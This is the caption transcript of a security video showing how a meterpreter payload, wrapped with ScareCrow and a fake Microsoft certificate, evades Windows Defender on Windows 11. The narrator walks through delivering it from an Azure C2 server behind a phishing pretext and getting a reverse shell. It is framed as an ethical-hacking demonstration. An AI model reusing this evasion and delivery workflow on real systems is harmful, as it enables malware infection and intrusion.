Bypassing a FULLY Patched Windows 11 + Defender with a Meterpreter Shell Using ScareCrow!

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey what is up everyone Tyler ramsby here back with another video and in this video I want to show you a second way to bypass Windows Defender so you may have seen my video from last week where we used Hulk shell specifically Hulk shell listener to bypass a fully patched version of Windows 11 and Windows Defender but the problem is some of you may have pointed out on LinkedIn is that was a very simple reverse shell not that hacky not that cool we're going to turn it up a notch and let's see if we can get a full interpreter shell on an updated version of Windows 11 and an updated version of Windows Defender using a really cool program called scarecrow without any more further Ado let's go ahead and dive into it now just to make sure I'm not making this up let's check window security the machine that we're on right now is not a virtual machine this is my real physical device my daily driver that I use day in and day out that I keep updated so you can see everything is on it was last updated 6 18 10 45 pm and it is 6 18 11 33 PM so everything is fully updated on this Windows Defender machine the way we're going to attack it is I wanted to make it as realistic as possible so we're not doing this in like VMS and vpns we are simulating what a real attacker would do so I have spun up a C2 server in Azure so that we have a public IP so that we can host malicious payloads for anyone with internet access so I can Target any computer so once again we're not going through a VPN y'all we're going across the internet like a real attacker would do to download the malicious file execute it on our machine and let's see if Defender can catch us so I spun up this VM we have SSH open and what I have done is just SSH into it so everything you see here although it looks like Powershell it is not I just use Powershell the SSH into our Kali Linux machine in the Azure Cloud now scarecrow has a few dependencies what I have done if you look at the description of this link I put in my GitHub A bash script run the bash script on your Cali VM it will download scarecrow and it will download all the dependencies so in a couple of minutes you are up and running just by running one script you're welcome so what the heck is scarecrow well scarecrow as a payload creation framework for side loading into legitimate Windows processes once the DL loader is loaded into memory it utilizes a technique to flush an edr's hook out of the system dlls running in the processes memory this works because we know the EDR hooks are placed when a process is spawned in other words it's just crazy I really don't know how all of this works but read through this if you want the technical details for this video I do not want to bore you by reading a long paragraph of stuff let's just do it right it may not work and when it comes to ethical hacking pen testing a lot of it is trial and error now to set the scenario the way a real attacker would set this up is it would likely create a web server and in their web server they would have a landing page that looks like a authentic Microsoft page what they might do then is if they have compromised credentials in your organization maybe someone's email or they send an email that looks like it's coming from help desk and they say hey everyone we are updating the software in our organization go ahead and go here download the installer get it installed and then you'll be fully updated and ready to go so you would use some social engineering maybe some phishing techniques to get this Exe on a victim's computer it will appear to be signed by Microsoft it will appear to be safe because defender's not going to pick up on it and boom you got them so will it work I don't know it's it's work sometimes it hasn't worked other times and we are just going to give it a shot and work through this together so if you have your own VM I would encourage you to follow along you can spin up a Cali VM and you can spin up like a Windows machine or set up networking on virtualbox or VMware and you can follow along with me run the script in the description the video get scarecrow installed and now the first thing we're going to do is generate our payload with msf Venom you can see my previous one from all the testing I've been doing as I've been playing around with this in my own little lab here we'll do our lhost which is going to be the public IP of our malicious C2 server L Port is going to be 443 to make look like regular traffic and we'll call it AV bypass dot bin while that does its thing let's go ahead and get Metasploit launch there we go all right AV bypass.bin is there so now we're going to run that through scarecrow I is we're going to inject it into AV bypass dot bin we want it to look like it's signed by microsoft.com so it looks a little more legit and we're going to add some encryption as well to make a little more difficult to figure out what is going on let's go ahead and click enter okay so we created this cmd.exe with a fake cert and it'll appear like it's signed by Microsoft so let's go ahead and move cmd.exe whoop cmd.exe to Home Tyler C2 server there we go and if we go over to our C2 server here we can go ahead and start a regular python web server but this is different than like your try hacking your hack the Box machine we're serving this out to all the internet so if I was doing this live you'd be able to come download this and uh get pwned by me in Metasploit let's get our listener ready so we'll use exploit multi Handler we have to set our payload to match the payload of the malicious payload we just created with msf Venom which was Windows x64 interpreter reverse TCP there we go let's go options we'll set our L host to match our malicious C2 server which is this right here so let's grab that down of course I want HTTP though we just want the IP and we'll set our L port on 443 because I have that Port listening in our networking stuff on Azure so we have our payload set we have our lhost set we have our L Port set let's go ahead and click run so our listener is ready we are good to go we are serving this file out maliciously once again a real attacker would probably set up like a landing page we just have welcome to Tyler C2 server so pretty obvious that it's it's malicious we can look at my test.txt file we're successfully storing or serving files let's see if we can do a cmd.exe of course an attacker probably wouldn't call it cmd.exe but we just want to see if we can bypass Defender this is not Defender catching it this is just a browser saying hey we don't normally download this but you might think okay well let me let me see more the name cmd.exe and it's signed by microsoft.com so I mean right it it must be safe ooh in Windows Defender caught us so we are zero of one in our fight against Windows Defender and what a real hacker would do is it would find one that works one that bypasses Windows Defender and then they would Target you with that one so let's make another one we have Excel we'll make a few of them and let's see if any of these make it past Windows Defender we have another another CMD all right so let's go back to this server and we will remove this cmd.exe so it's clean and let's go over to scarecrow and we'll move excel.exe PowerPoint whoops powerpoint.exe what else we got word.exe cmd.exe is that all of them to Home Tyler C2 server and then on our C2 server all right sudo Python 3 Dash m let's see if any of these can make it past Windows Defender shall we oh it looks like excel.exe maybe made it past Defender let's make sure our listener is running right now and so if I was an attacker I'd be like all right I'm going to take note of that and you can see it looks it looks legit so even if we take this application move it over here you're like oh okay this is Excel right so help desk told me I need to update Excel download this exe and I'll run it it was signed by Microsoft everything must be good and so let's just double click it okay that's a little out of the ordinary but maybe it helped us that that's gonna happen and look at that we have fully bypassed Windows Defender we have a full meterpreter shell and a fully patched version of Windows 11 fully patched version of Windows Defender I have an interpreter shell on my host machine and it only took two iterations of it our first exe did not work Windows Defender caught it but as a hacker what I would have done if I was targeting someone is I would spin up a version that they're running of Windows Defender and I would try till I have one that bypasses Defender and then I would use that one to Target the user knowing that that one is going to work so meterpreter is running I have an interpreter shell from here you can enumerate for information maybe if you're not already admin you can look privilege escalation you can set up persistence here maybe make your own account on the host machine if it's an active directory environment you can begin to dig deeper into the environment to see what you can find but friends that is why you don't use Windows Defender in an Enterprise environment a real EDR endpoint detection response solution would likely detect this based on Behavior but we did bypass Windows 11 and Windows Defender using scarecrow hopefully you guys found this video interesting a little bit fun to watch and uh have fun out there I'll catch you guys in the next one see ya

Info

Channel: Tyler Ramsbey

Views: 14,904

Rating: undefined out of 5

Keywords:

Id: HmiAddzFFac

Channel Id: undefined

Length: 9min 48sec (588 seconds)

Published: Mon Jun 19 2023